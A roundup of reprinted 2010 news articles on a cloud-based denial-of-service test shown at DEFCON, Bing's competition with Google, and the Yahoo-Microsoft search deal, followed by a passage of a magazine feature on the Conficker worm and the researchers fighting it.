LAS VEGAS, NEVADA -- DEFCON 2010 -- With the help of the cloud, taking down small and midsize companies' networks is easy, two consultants told attendees here last week.

With a credit card and e-mail address, security consultants David Bryan of Trustwave and Michael Anderson of NetSPI created a handful of virtual server instances on Amazon's EC2 and used a homemade program to attack the network of a client -- a small business that wanted its connectivity tested.

With only three servers -- although they eventually scaled up to 10 -- the consultants took the company off the Internet. The price? Six dollars.

"A threat agent could potentially run extortion schemes against a company by attacking for a couple of hours -- and then telling the company that, if you don't pay me, then I will attack you again," Bryan said.

It's surprising how easy it is to block a company's lifeblood connection to the Internet, the consultants said. To set up an account on Amazon EC2, there are no special bandwidth agreements or detection of servers taking malicious actions, they claimed. Moreover, complaints to Amazon by the client apparently went unanswered.

"We never got a response from Amazon," Anderson said. "We haven't gotten a call; we never got an email."

Amazon could not comment on the consultants' specific claims, but stressed that the company does have a rigorous response process.

"We do have a process for both detecting and responding to reports of abuse," Amazon spokeswoman Kay Kinton said in an email response. "We take all claims of misuse of our services very seriously and investigate each one. When we find misuse, we take action quickly and shut it down."

Small and midsize businesses should focus on basic strategies to defend themselves against cloud-based denial-of-service attacks, experts say. While cloud services are a new way to deliver attacks, the steps needed to defend a business' network and keep it connected are no different than those used to defend against run-of-the-mill packet floods.

First, employees responsible for a business's IT should have a DoS mitigation strategy and test it. An example of how not to do it: The target of the consultants' attack, a small financial institution, had defensive hardware in place, but had the threshold bandwidth set way too high. The attack failed to trigger defensive measures, but the bandwidth was still enough to take down the network, Bryan said.

"You have to make sure to tune your defenses," he said.

Clear responsibilities in the event of an attack are also key, the consultants said. Once attacked, the client's employees became angry with each other and debated who was responsible for responding.

"In the event of an attack or incident, you cannot be adversarial," Bryan said. "Information sharing is key."

Most cybercriminals use botnets to conduct denial-of-service attacks on their targets. Many botnets can be rented, or a subset of machines leased, essentially giving would-be attackers a criminal "cloud" from which to buy services.

But renting server time from a legitimate cloud service is cheaper and can be more effective, according to Bryan and Anderson. Because the traffic comes from Amazon's Internet space, it can be harder to filter. And scaling the attack up is as easy as instantiating a new virtual server. Moreover, many cloud services -- especially infrastructure-as-a-service clouds -- appear to respond slowly to abuse.

"It's essentially a town without a sheriff," Bryan said.

Amazon refuted those assertions, saying that dealing with attacking servers is much easier since it can identify them and shut them down.

"One thing I'd point out is that abusers who choose to run their software in an environment like Amazon EC2 make it easier for us to access and disable their software," Amazon's Kinton says. "This is a significant improvement over the Internet as a whole, where abusive hosts can be inaccessible and run unabated for long periods of time."

The two consultants created a prototype attack tool, called Thunder Clap, that uses cloud-based services to send a flood of packets toward the target company's network. The software can be controlled directly or through a command left on a social network, the researchers said.

The consultants recommended that providers that offer easy-to-configure cloud services -- Amazon, Google, Microsoft and Rackspace -- should be more responsive to complaints and more aware of the attack potential of their networks.

"If we complain loudly enough, maybe they will become more responsive," Anderson said.

Source: http://www.darkreading.com

Edwin Perello discovered that Bing, the Microsoft search engine, could find addresses in his rural Indiana town when Google could not. Laura Michelson, an administrative assistant in San Francisco, was lured by Bing’s flight fare tracker. Paul Callan, a photography buff in Chicago, fell for Bing’s vivid background images.

Like most Americans, they still use Google as their main search tool. But more often, they find themselves navigating to Microsoft’s year-old Bing for certain tasks, and sometimes they stay a while.

“I was a Google user before, but the more I used Bing the more I liked it,” Mr. Callan said. “It’s more like muscle memory takes me to Google.”

Bing still handles a small slice of Web searches in the United States, 12.7 percent in June, compared with Google’s 62.6 percent, as measured by comScore, the Web analytics firm. But Bing’s share has been growing, as has Yahoo’s, while Google’s has been shrinking.

And while no one argues that Google’s dominance is in immediate jeopardy, Google is watching Microsoft closely, mimicking some of Bing’s innovations — like its travel search engine, its ability to tie more tools to social networking sites and its image search — or buying start-ups to help it do so in the future.

Google has even taken on some of Bing’s distinctive look, like giving people the option of a Bing-like colorful background, and the placement of navigation tools on the left-hand side of the page.

When Microsoft introduced it last year, Bing made a splash with its vivid background images.
In June, Google presented searchers the option of a colorful background rather than the stark, white page.

The result is a renaissance in search, resulting in more sophisticated tools for consumers who want richer answers to complex questions than the standard litany of blue links.

The competition is a remarkable and surprising twist: Microsoft, knocked around for so long as a bumbling laggard, has given the innovative upstart Google a kick in the pants. As the search engines introduce feature after competing feature, some analysts say they have set off an arms race, with the companies poised to spend whatever it takes to win the second phase of Web search.

“There is a cold war going on,” said Sandeep Aggarwal, senior Internet and software analyst at Caris & Company, who watches both companies. “Clearly, you can see how Bing’s competition is forcing Google to try and catch up in some places.”

Google officials agree there is more competition, but say they are not simply reacting to the younger search engine.

Google’s new features have not been in response to Bing, said Marissa Mayer, the company’s vice president for search products and user experience. “A lot of these things have been in the works for a long time,” she said. “Left-hand navigation we worked on for almost two years. We wanted to make sure we had it exactly right.”

Microsoft’s gains are far from staggering. Its share of searches has grown to 12.7 percent, from 8 percent, since Bing was introduced in May 2009, and Yahoo, which has a search deal with Microsoft, still handles a larger share of searches than Bing. And in the newest search frontier, mobile devices, Google has even more market share than on the Web at large.

Still, Bing’s gains have impressed analysts, who have watched Google fend off repeated assaults on its lucrative search and ad business, which accounts for some 95 percent of its revenue.

Building a more comprehensive, faster and more accurate search engine than Google is a daunting challenge, and a long list of big companies and start-ups have failed in their attempts. Microsoft endured plenty of ribbing as it spent years building and then scrapping search systems meant to help it compete against Google. But it kept experimenting until it found a way.

Microsoft has spent billions of dollars building the computing centers needed to power search and advertising systems and acquiring start-ups with niche expertise. In addition, it has thrown money at consumers, through cash-back programs on purchases, and at partners willing to promote Bing ahead of Google. Over the last year, Microsoft’s online services division lost $2.36 billion on revenue of $2.2 billion.

With Bing, Microsoft has tried to attract people like Mr. Callan by excelling at answering frequently asked questions, like those related to travel, health, shopping, entertainment and local businesses. For example, Bing has flight search and prediction tools that reveal price fluctuations for certain routes, and advises customers whether to buy or wait. Bing Health uses data from sources like the Mayo Clinic and Healthwise.

The hope is that “somebody would come back just for that and then, down the line, they would do other types of searches, too,” said Danny Sullivan, a longtime industry analyst and editor in chief of the blog Search Engine Land.

People do not always want to click on links and dig through pages to hunt out information, so when Bing started in May 2009, it pulled relevant information and stuck it on the top and left-hand side of the results pages. Search “Angelina Jolie,” for instance, and see a slide show and a list of her movies on top and related links on the side.

“We said, ‘Let’s change the entire way we lay out pages,’ ” said Yusuf Mehdi, a senior vice president for Microsoft’s online audiences business. “We will not be shackled by blue links.”

Google, meanwhile, has quietly introduced its own new features that have in several instances looked a lot like Bing’s.

For example, in May, it too added the left-hand navigation tools — though Ms. Mayer of Google pointed out that many of the tools had already been available, just not easily visible from the search page.

“Certainly there’s been increased competition in the space,” Ms. Mayer said of Bing. “When there’s more competition, everyone’s search gets better, that serves the users a lot better.”

Bing’s travel tool uses technology from Farecast, which Microsoft bought in early 2008. In July, Google announced plans to acquire ITA Software for $700 million; ITA makes the same comparison shopping software for flights that Bing’s Farecast uses.

Then there is the look of the main search pages for each site. Microsoft has argued that the vivid images ever-present behind the Bing search box have helped its appeal; young people and women have shown a particular fondness for Bing. In June, Google offered people the option to have a colorful background image like the Golden Gate Bridge on its main search page rather than the stark, white page that helped make Google famous.

Google has also played catch-up to Microsoft in offering ways to search for and digest more images in one go, and has trailed in adding some tie-ins to social networking sites.

“Google’s new innovations have come at a slower pace,” Mr. Aggarwal said. “There was no one challenging Google until Microsoft decided it was a business they would not give up.”

Still, Mr. Sullivan and other analysts also say Google has been making many significant but subtle behind-the-scenes changes that make it better at responding to obscure and complex queries. Google made 500 tweaks to its secret search algorithm last year and introduced personalized search, which customizes results based on what users frequently click on.

Google executives often chide Microsoft that it overengineers software like Office and bombards people with needless features. But now Google has swapped its clean, simple approach to search in favor of a feature war with Microsoft.

“Google seems to do things because Bing has done something,” Mr. Sullivan said. “It’s a kind of knee-jerk thing — we have to do this product now because we don’t want people to think we’re weak.”

Source: http://www.nytimes.com

Yahoo Inc. engineers began testing keywords in Microsoft Corp.'s search advertising system for the first time last week, a key step toward implementing a comprehensive search agreement the two companies hope will reshape the industry.

The so-called "shadow tests" replicate how keywords will perform when Yahoo's advertisers are plugged into Microsoft's adCenter system, which will soon power the paid search businesses of both companies. The test results will help determine whether Yahoo and Microsoft can flip the switch on their unusual partnership this fall, as they hope.

"The next couple of weeks are going to be critical," said David Karnstedt, who runs search engine marketer Efficient Frontier.

The tests, which come almost one year after the alliance was announced, are part of a meticulously planned blueprint that Yahoo and Microsoft hope will position them as an effective counterweight to industry leader Google Inc.

Though the partners will have less than a third of the $12.4 billion U.S. search market, they want to achieve enough scale to generate better returns for advertising clients, more revenue for themselves and greater profits for investors.

Microsoft hopes the 10-year revenue-sharing pact will help turn its ailing online services division into a profitable business. Yahoo says the agreement will enable it to cut costs, focus on display advertising and deliver search results in more innovative ways.

Microsoft's Bing search engine will power searches on Yahoo Web sites. The two companies' small and midsize advertisers will use Microsoft's adCenter paid search platform to buy keywords and put ads on Web pages. Yahoo's sales staff will handle the largest advertising accounts for both companies.

While Yahoo is free to choose any partner for mobile search and search advertising, the company said it will rely on Microsoft in the U.S., Canada, the U.K. and France. Yahoo said the shift in each market is expected to coincide with the desktop migration schedule and it may soon add other markets.

For the past two months, Yahoo and Microsoft have been shadow-testing the algorithmic search technologies that generate the non-paid search results on their Web pages, according to Mark Morrissey, who runs Yahoo's integration team.

The project remains on schedule as engineers eliminate bugs in the system, he said. They aim to gradually increase the volume of Yahoo traffic that passes through Bing, eventually fabricating imaginary queries so they can stress-test the system beyond full capacity.

"The most challenging time is when we get to 100%-130% (of full capacity) because it tests not only the functionality, but the limits of the infrastructure," Mr. Morrissey said.

Shifting Yahoo's advertisers to Microsoft's adCenter will be far more complicated. Microsoft must beef up adCenter to process four times the traffic it currently handles. Engineers also have been adding features from Yahoo's Panama search advertising system that weren't in adCenter, such as giving advertisers more control over where their ads appear.

Key questions remain. The most critical is whether the alliance will generate better returns for advertisers, as well as more revenue per search for the companies.

Second-quarter data from Efficient Frontier shows Microsoft's advertisers get an average return on investment that is 21% higher than Google--the industry standard--while Yahoo returns 25% less than Google. Advertisers focus on ROI because it enables them to measure the performance of search ads against the overall cost of such campaigns.

Chris Lien, who runs search marketer Marin Software Inc., said Yahoo's relatively low ROI might simply cancel out Microsoft's, reducing the combined platform's appeal to advertisers.

Still, Yahoo and Microsoft aim to make the transition in the U.S. and Canada by Oct. 15, giving advertisers, ad agencies and search-engine marketers enough time to switch over before the crucial holiday shopping season. Mr. Morrissey said the two companies have hit every major milestone on schedule. But they won't flip the switch until they are comfortable the combined market place can deliver adequate ROI for advertisers.

Source: http://online.wsj.com

When the Conficker computer “worm” was unleashed on the world in November 2008, cyber-security experts didn’t know what to make of it. It infiltrated millions of computers around the globe. It constantly checks in with its unknown creators. It uses an encryption code so sophisticated that only a very few people could have deployed it. For the first time ever, the cyber-security elites of the world have joined forces in a high-tech game of cops and robbers, trying to find Conficker’s creators and defeat them. The cops are failing. And now the worm lies there, waiting …

By Mark Bowden

Image credit: Alex Ostroy

The first surprising thing about the worm that landed in Philip Porras’s digital petri dish 18 months ago was how fast it grew.

He first spotted it on Thursday, November 20, 2008. Computer-security experts around the world who didn’t take notice of it that first day soon did. Porras is part of a loose community of high-level geeks who guard computer systems and monitor the health of the Internet by maintaining “honeypots,” unprotected computers irresistible to “malware,” or malicious software. A honeypot is either a real computer or a virtual one within a larger computer designed to snare malware. There are also “honeynets,” which are networks of honeypots. A worm is a cunningly efficient little packet of data in computer code, designed to slip inside a computer and set up shop without attracting attention, and to do what this one was so good at: replicate itself.

Most of what honeypots snare is routine, the viral annoyances that have bedeviled computer-users everywhere for the past 15 years or so, illustrating the principle that any new tool, no matter how useful to humankind, will eventually be used for harm. Viruses are responsible for such things as the spamming of your inbox with penis-enlargement come-ons or million-dollar investment opportunities in Nigeria. Some malware is designed to damage or destroy your computer, so once you get the infection, you quickly know it. More-sophisticated computer viruses, like the most successful biological viruses, and like this new worm, are designed for stealth. Only the most technically capable and vigilant computer-operators would ever notice that one had checked in.

Porras, who operates a large honeynet for SRI International in Menlo Park, California, noted the initial infection, and then an immediate reinfection. Then another and another and another. The worm, once nestled inside a computer, began automatically scanning for new computers to invade, so it spread exponentially. It exploited a flaw in Microsoft Windows, particularly Windows 2000, Windows XP, and Windows Server 2003—some of the most common operating systems in the world—so it readily found new hosts. As the volume increased, the rate of repeat infections in Porras’s honeynet accelerated. Within hours, duplicates of the worm were crowding in so rapidly that they began to push all the other malware, the ordinary daily fare, out of the way. If the typical inflow is like a stream from a faucet, this new strain seemed shot out of a fire hose. It came from computer addresses all over the world. Soon Porras began to hear from others in his field who were seeing the same thing. Given the instant and omnidirectional nature of the Internet, no one could tell where the worm had originated. Overnight, it was everywhere. And on closer inspection, it became clear that voracity was just the first of its remarkable traits.

Various labs assigned names to the worm. It was dubbed “Downadup” and “Kido,” but the name that stuck was “Conficker,” which it was given after it tried to contact a fake security Web site, trafficconverter.biz. Microsoft security programmers shuffled the letters and came up with Conficker, which stuck partly because ficker is German slang for “motherfucker,” and the worm was certainly that. At the same time that Conficker was spewing into honeypots, it was quietly slipping into personal computers worldwide—an estimated 500,000 in the first month.

Why? What was its purpose? What was it telling all those computers to do?

Imagine your computer to be a big spaceship, like the starship Enterprise on Star Trek. The ship is so complex and sophisticated that even an experienced commander like Captain James T. Kirk has only a general sense of how every facet of it works. From his wide swivel chair on the bridge, he can order it to fly, maneuver, and fight, but he cannot fully comprehend all its inner workings. The ship contains many complex, interrelated systems, each with its own function and history—systems for, say, guidance, maneuvers, power, air and water, communications, temperature control, weapons, defensive measures, etc. Each system has its own operator, performing routine maintenance, exchanging information, making fine adjustments, keeping it running or ready. When idling or cruising, the ship essentially runs itself without a word from Captain Kirk. It obeys when he issues a command, and then returns to its latent mode, busily doing its own thing until the next time it is needed.

Now imagine a clever invader, an enemy infiltrator, who does understand the inner workings of the ship. He knows it well enough to find a portal with a broken lock overlooked by the ship’s otherwise vigilant defenses—like, say, a flaw in Microsoft’s operating platform. So no one notices when he slips in. He trips no alarm, and then, to prevent another clever invader from exploiting the same weakness, he repairs the broken lock and seals the portal shut behind him. He improves the ship’s defenses. Ensconced securely inside, he silently sets himself up as the ship’s alternate commander. He enlists the various operating functions of the ship to do his bidding, careful to avoid tripping any alarms. Captain Kirk is still up on the bridge in his swivel chair with the magnificent instrument arrays, unaware that he now has a rival in the depths of his ship. The Enterprise continues to perform as it always has. Meanwhile, the invader begins surreptitiously communicating with his own distant commander, letting him know that he is in position and ready, waiting for instructions.

And now imagine a vast fleet, in which the Enterprise is only one ship among millions, all of them infiltrated in exactly the same way, each ship with its hidden pilot, ever alert to an outside command. In the real world, this infiltrated fleet is called a “botnet,” a network of infected, “robot” computers. The first job of a worm like Conficker is to infect and link together as many computers as possible—the phenomenon witnessed by Porras and other security geeks in their honeypots. Thousands of botnets exist, most of them relatively small—a few thousand or a few tens of thousands of infected computers. More than a billion computers are in use around the world, and by some estimates, a fourth of them have been surreptitiously linked to a botnet. But few botnets approach the size and menace of the one created by Conficker, which has stealthily linked between 6 million and 7 million computers.

Once created, botnets are valuable tools for criminal enterprise. Among other things, they can be used to efficiently distribute malware, to steal private information from otherwise secure Web sites or computers, to assist in fraudulent schemes, or to launch denial-of-service attacks—overwhelming a target computer with a flood of requests for response. The creator of an effective botnet, one with a wide range and the staying power to defeat security measures, can use it himself for one of the above scams, or he can sell or lease it to people who specialize in exploiting botnets. (Botnets can be bought or leased in underground markets online.)

Beyond criminal enterprise, botnets are also potentially dangerous weapons. If the right order were given, and all these computers worked together in one concerted effort, a botnet with that much computing power could crack many codes, break into and plunder just about any protected database in the world, and potentially hobble or even destroy almost any computer network, including those that make up a country’s vital modern infrastructure: systems that control banking, telephones, energy flow, air traffic, health-care information—even the Internet itself.

The key word there is could, because so far Conficker has done none of those things. It has been activated only once, to perform a relatively mundane spamming operation—enough to demonstrate that it is not benign. No one knows who created it. No one yet fully understands how it works. No one knows how to stop it or kill it. And no one even knows for sure why it exists.

If yours is one of the infected machines, you are like Captain Kirk, seemingly in full command of your ship, unaware that you have a hidden rival, or that you are part of this vast robot fleet. The worm inside your machine is not idle. It is stealthily running, issuing small maintenance commands, working to protect itself from being discovered and removed, biding its time, and periodically checking in with its command-and-control center. Conficker has taken over a large part of our digital world, and so far most people haven’t even noticed.

The struggle against this remarkable worm is a sort of chess match unfolding in the esoteric world of computer security. It pits the cleverest attackers in the world, the bad guys, against the cleverest defenders in the world, the good guys (who have been dubbed the “Conficker Cabal”). It has prompted the first truly concerted global effort to kill a computer virus, extraordinary feats of international cooperation, and the deployment of state-of-the-art decryption techniques—moves and countermoves at the highest level of programming. The good guys have gone to unprecedented lengths, and have had successes beyond anything they would have thought possible when they started. But a year and a half into the battle, here’s the bottom line:

The worm is winning.

A Digital Sam Spade

Twenty years ago, computers were bedeviled by hackers. These were savvy outlaws who used their deep knowledge of operating systems to invade, steal, and destroy, or sometimes just to tap into secure facilities and show off their skills. Hackers became heroes to a generation of teenagers, and had all sorts of motives, but their most distinctive trait was a tendency to show off.

Some had truly malicious intent. In his 1989 best seller, The Cuckoo’s Egg, Cliff Stoll told the story of his stubborn, virtually single-handed hunt for an elusive hacker in Germany who was using Stoll’s computer system at the Lawrence Berkeley National Laboratory as a portal to Defense Department computers. For many people, Stoll’s book was the introduction to the netherworld of rarefied gamesmanship that defines computer security. Stoll’s hacker never penetrated the most secret corners of the national-security net, and even relatively serious breaches like the one Stoll described were more nuisance than threat. But the individual hacker working as a spy or vandal has evolved into something more organized and menacing.

Andre’ M. DiMino, a computer sleuth who is part of the Conficker Cabal, is considered one of the world’s foremost authorities on botnets. He stumbled into his avocation on a Monday morning a decade ago, when he discovered that over the weekend, someone had broken into the computer system he was administering for a small company in New Jersey. DiMino has an undergraduate degree in electrical engineering with an emphasis in computer science, but he has mostly taught himself up to his present level of expertise, which is extreme. At 45, he is a slender, affable idealist who keeps a small array of computers in an upstairs bedroom. When I stopped by to talk to him, he baked me pizza. His day job is doing computer forensics for law enforcement in Bergen County, New Jersey, but he has a kind of alter ego as what he calls a “botnet hunter.”

Back when he discovered the weekend break-in, DiMino assumed at first that it was the work of a hacker, a vandal, or possibly a former employee, only to discover, based on an analysis of the IP (Internet Protocol) addresses of the incoming data, that his little computer network had been invaded by someone from Turkey or Ukraine. What would someone halfway around the planet want with the computer system of a small business-management firm in a New Jersey office park? Apparently, judging by what he found, his invader was in the business of selling pirated software, movies, and music. Needing large amounts of digital storage space to hide stolen inventory, the culprit seemed to have conducted an automated search over the Internet, looking worldwide for vulnerable systems with large amounts of unused disc space—DiMino equates it to walking around rattling doorknobs, looking for one door left unlocked. DiMino’s system fit the bill, so the crooks had dumped a huge bloc of data onto his discs. He erased the stash and locked the door that had allowed the pirates in. As far as the company was concerned, that solved the problem. No harm done. No need to call the police or investigate further.

But DiMino was intrigued. He reviewed the server logs for previous weeks and saw that this successful invasion was one of many such efforts. Other attackers had been rattling the doors of his network, looking for vulnerabilities. If there were bad guys actively exploiting other people’s computers all over the world, designing sophisticated programs to exploit weaknesses … how cool was that? And who was trying to stop them?

DiMino set about educating himself on the fine points of this obscure battle of wits. He eventually co-founded the Shadowserver Foundation, a nonprofit partnership of defense-minded geeks at war with malware, effectively transforming himself into a digital Sam Spade—indeed, the graphic atop Shadowserver’s home page features a Dashiell Hammett–style detective emerging from shadow.

Both sides in this cyberwar have become astonishingly sophisticated, operating at the cutting edge of programming theory and cryptography. Both understand the limits of security methodology, the one side working to broaden its reach, the other working to surpass it. Because malware has been automated, the good guys usually can only guess at who they are up against.

Trojans, Viruses, and Worms

Rodney Joffe heads the cabal that has been battling Conficker. He is a burly, garrulous South African–born American who serves as senior vice president and chief technologist for Neustar, a company that provides trunk-line service for competing cell-phone companies around the world. Joffe’s interest in stopping the worm did not stem just from his outrage and sense of justice. His concern for Neustar’s operation is professional, and illustrative.

The company runs a huge local-number-portability database. Almost every phone call in North America, before it’s completed, must ask Neustar where to go. Back in the old days, when the phone company was a monopoly, telecommunications were relatively simple. You could figure out where a phone call was going, right down to the building where the target phone would ring, just by looking at the number. Today we have competing telephone companies, and cell phones, and a person’s telephone number is no longer necessarily tied to a geographic location. In this more complex world, someone needs to keep track of every single phone number, and know where to route calls so they end up in the right place. Neustar performs this service for telephone calls, and is one of many registries that oversee high-level Internet domains. It is, in Joffe’s words, “the map.”

“If I disappear, there’s no map,” he says. “So if you take us down, whole countries can actually disappear from the grid. They’re connected, but no one can find their way there, because the map’s disappeared.”

A botnet like Conficker could theoretically be used to shut down Neustar’s system. So Joffe helped form the Conficker Cabal. He scoffed when he read in late 2009 that the Obama administration’s Department of Homeland Security planned to hire “a thousand” computer-security experts over the next three years. “There aren’t more than a few hundred people in the world who understand this stuff.”

Most of us use the word virus to describe all malware, but in geekspeak, it means something more specific. There are three types of the stuff: Trojans, viruses, and worms. A Trojan is a piece of software that works like a Trojan horse, masquerading as one thing to get inside a computer, and then attacking. A virus attacks the host computer after slipping in through a hole in its operating system. It depends on the computer-operator—you—doing something stupid to activate it, like opening an attachment to an e-mail that appears innocuous, or clicking on an enticing link. A worm works like a virus, exploiting flaws in operating systems, but it doesn’t attack once it breaks in. It generally doesn’t have a malicious payload. Exactly like the most-sophisticated viruses in the biological world, it does not cripple or kill its host. It is primarily designed to spread. The instructions that will put a worm like Conficker to work are not embedded in its code; they will be delivered later, from a remote command center.

In the old days, when your computer got infected, it slowed down because your commands had to compete for processing with viral invaders. You knew something was wrong because the machine took 10 times longer to boot up, or there was a delay between command and response. You began to get annoying pop-ups on your screen directing you to download supposedly remedial software. Programs would freeze. In this sense, the old malware was like the Ebola virus, a very scary strain that messily kills nearly everyone it infects—which is another way of saying that it is grossly ineffective, because it burns out the very host organisms it needs to survive. The miscreants who created computer viruses years ago learned that malware that announces itself in these ways doesn’t last.

So today’s malware produces no pop-ups, no slowdowns. A worm is especially quiet, since all it does, at least initially, is spread. Conficker stealthily sets up shop without making a ripple, and—other than calling home periodically for instructions—just waits. Its regular messages to its command center amount to only a couple hundred bytes of data, which is not enough to even light up the little bulb that flashes when a computer hard drive is at work.

After Phil Porras and others began snaring Conficker in increasing numbers, they began dissecting it. The worm itself was exquisite. It consisted of only a few hundred lines of code, no more than 35 kilobytes—slightly smaller than a 2,000-word document. In comparison, the average home computer today has anywhere from 40 to 200 gigabytes of storage. Unless you were looking for it, unless you knew how to look for it, you would never see it. Conficker drifts in like a mote.

It exploited a specific hole, Port 445, in the Microsoft operating systems, a vulnerability that the manufacturer had tried to repair just weeks earlier. Ports are designated “listening” points in a system, designed to transmit and receive particular kinds of data. There are many of them, more than 65,000, because an operating system consists of layer upon layer of functions. A firewall is a security program that guards these ports, controlling the flow of data in and out. Some ports, like the one that handles e-mail, are heavily trafficked. Most are not; they listen for updates and instructions that deal with a narrow and specific function, usually routine procedures that never rise to the notice of computer-users. Only certain very specific kinds of data can flow through ports, and then only with the appropriate codes. Windows opens Port 445 by default to perform tasks like issuing instructions for print-sharing or file-sharing. Late in the summer of 2008, Microsoft learned that even a system protected by a firewall was vulnerable at Port 445 if print-sharing and file-sharing were enabled (which they were on many computers). In other words, even a well-protected computer had a hole. On October 23, 2008, the company issued a rare “critical security bulletin” (MS08-067) with a patch to repair that hole. A specially crafted “remote procedure call” could allow the port to be used by a remote operator, the security bulletin warned, and “an attacker could exploit this vulnerability without authentication to run arbitrary code.” The patch Microsoft offered theoretically slammed the door on a worm like Conficker almost a month before it appeared.

Theoretically.

In fact, the bulletin itself may have inspired the creation of Conficker. Many, many computer-operators worldwide—you know who you are—fail to diligently heed security updates. And the patches are issued only to computers with validated software installations; millions of computers run on bootlegged operating systems, which have never been validated. Microsoft issues its updates on the second Tuesday of every month. Every geek in the world knows this; it’s called “Patch Tuesday.” The company employs some of the best programmers in the world to stay one step ahead of the bad guys. If everyone applied the new patches promptly, Windows would be nigh impregnable. But because so many people fail to apply the patches promptly, and because so many machines run on illegitimate Windows systems, Patch Tuesday has become part of Microsoft’s problem. The company points out its own vulnerabilities, which is like a general responsible for defending a fort making a public announcement—“The back door to the supply shed in the southeast corner of the garrison has a broken lock; here’s how to fix it.” When there is only one fort, and it is well policed, the lock is fixed and the vulnerability disappears. But when you are defending millions of forts, and a goodly number of the people responsible for their security snooze right through Patch Tuesday, the security bulletin doesn’t just invite attack, it provides a map! Twenty-eight days after the MS08-067 security bulletin appeared, Conficker started worming its way into unpatched computers.

The Cabal’s Sandboxes

Conficker’s rate of replication got everyone’s attention, so a loose-knit gaggle of geeky “good guys,” including Porras, Joffe, and DiMino, began picking the worm apart. The online-security community consists of software manufacturers like Microsoft, companies like Symantec that sell security packages to computer owners, large telecommunication registries like Neustar and VeriSign, nonprofit research centers like SRI International, and botnet hunters like Shadowserver. In addition to maintaining honeypots, these security experts operate “sandboxes”—isolated computers (or, again, virtual computers inside larger ones) where they can place a piece of malware, turn it on, and watch it run. In other words, where they can play with it.

They all started playing with Conficker, comparing notes on what they found, and brainstorming ways to defeat it. That’s when someone dubbed the group the “Conficker Cabal,” and the name stuck, despite discomfort with the darker implications of the word. Here are some of the things the cabal discovered about the worm in those first few weeks:

• It patched the hole it came through at Port 445, making sure it would not have to compete with other worms. This was smart, because surely other hackers had seen security bulletin MS08-067.
•It tried to prevent communication with security providers (many computer-users subscribe to commercial services that regularly update antivirus software).
•When it started, if the IP address of the infected computer was Ukrainian, the worm self-destructed. When in attack mode, searching for other computers to infect, it skipped any with a Ukrainian IP address.
•It disabled the Windows “system restore” points, a useful tool that allows users with little expertise to simply reset an infected machine to a date prior to its infection. (System restore is one of the easiest ways to debug a machine.)

All of these things were clever. They indicated that Conficker’s creator was up on all the latest tricks. But the main feature that intrigued the cabal was the way the worm called home. This is, of course, what worms designed to create botnets do. They settle in and periodically contact a command center to receive instructions. Botnet hunters like DiMino regularly wipe out whole malicious networks by deciphering the domain name of the command center and then getting it blocked. In the old days, this was easier because malware pointed to only a few IP addresses, which could be blocked by hosting providers and Internet service providers. The newer worms like Conficker bumped the game up to a higher level, generating domain names that involve many providers and a wide range of IP addresses, and that security experts can block only by contacting Internet registries—organizations that manage the domain registrations for their realm. But Conficker did not call home to a fixed address.

Shortly after it was discovered, the worm began performing a new operation: generating a list of domain names seemingly at random, 250 a day across five top-level domains (top-level domains are defined by the final letters in a Web address, such as .com or .edu or .uk). The worm would then go down the list until it hit upon the one connected to its remote controller’s server. All Conficker’s controller had to do was register one of the addresses, which can be done for a fee of about $10, and await the worm’s regular calls. If he wished, he could issue instructions. It was as if the boss of a crime family told his henchmen to check in daily by turning to the bottom of a certain page in each day’s Racing Form, where there would be a list of potential numbers. They would then call each number until the boss picked up. So it was not apparent from day to day where the worm would call home.

With the Racing Form trick, if you were a cop and were tipped off where to look, you might arrange with the paper’s publisher to see the page before it was printed, and thus be one step ahead of the henchmen and their boss. To defeat Conficker, the geeks would have to figure out in advance what the numbers (or, in this case, domain names) would be, and then hustle to either buy up or contact every one, block it, or cajole whoever owned it to cooperate before the worm “made the call.”

Michael Ligh, a young Brooklyn researcher employed by the computer-security company iDefense, is one of several people who went to work unraveling Conficker’s methods. Ligh and others had seen algorithms for random-domain-name generation before, and most were keyed to the infected computer’s clock. If new places to call home must be generated every day, or every few hours, then the worm needs to know when to perform the procedure. So the malware simply checks the time on its host computer. This provided the good guys with a tool to defeat it. They turned the clock forward on their sandbox computer, forcing their captured strain of the worm to spit out all the domain names it would generate for as long into the future as they cared to look. It was like stealing the teacher’s edition of a classroom textbook, the one with all the answers to the quizzes and tests printed in the back. Once you knew all the places the malware would be calling, you could cordon off those sites in advance, effectively stranding the worm.

Conficker had an answer for that. Instead of using the infected computer’s clock, the worm set its schedule by the time on popular corporate home pages, like Yahoo, Google, or Microsoft’s own msn.com.

“That was interesting,” Ligh said. “There was no way we could turn the clock forward on Google’s home page.”

So there was no easy way to predict the list of domain names in advance. But there was a way. The first step was to set up a proxy server to, in effect, intercept the time update from the big corporate Web site before it got back to the worm, alter the information, and then send it on. You could then tell the worm it was a date sometime in the future, and the worm would spit out the domain names for that date. This was a tedious way to proceed, since you could generate only one set of new domain names at a time. So Ligh and other researchers reverse-engineered the worm’s algorithm, extracted the time-update function, and wedded it to a piece of code they could control. They instructed their copy to generate the future lists in advance. They could then buy up or block all the sites, and direct all the worm’s communications into a “sinkhole,” a dead-end location where calls go unanswered. Conficker’s creators had deliberately made the task so onerous and expensive that no one would go to the trouble of blocking all possible command centers.

Or so they thought. The cabal, through a determined and unprecedented effort, did manage to cordon off the worm. By the end of 2008, Conficker had infected an estimated 1.5 million machines worldwide, but it was on its way to full containment. In the great chess match, the good guys had called “Check!”

Then the worm turned.

MD-6

On December 29, 2008, a new version of Conficker showed up, and if the geeks had been intrigued with the original version, they now experienced something more akin to respect … mingled with fear.

One of the early theories about the worm was that it had slipped out of a computer-science lab, the product of some fooling-around by a sophisticated graduate student or group of students. They had loosed it on the world inadvertently, or maybe on purpose as a prank or experiment without realizing how effective it would be. This hypothesis appealed to optimists.

The new version of the worm, Conficker B, exploded the benevolent-accident theory. It was clear that the worm’s creator had been watching every move the good guys made, and was adjusting accordingly. He didn’t care that the good guys could predict its upcoming lists of domain names. He just rejiggered the worm to spread the new lists out over eight top-level domains instead of five, making the job of blocking them far more difficult. The worm had no trouble contacting all of these locations. If it received no command from one, it simply tried the next one on its list. Conficker B could go on like this for months, even years. It had to find its controller only once to receive instructions.

“That’s a high number,” Rodney Joffe, of Neustar, told me. “The cops will get sick and tired of knocking on 250 doors a day and finding there’s no one there. And if I’m the chief bad guy, all I have to do is be behind one of those doors on one of those days.”

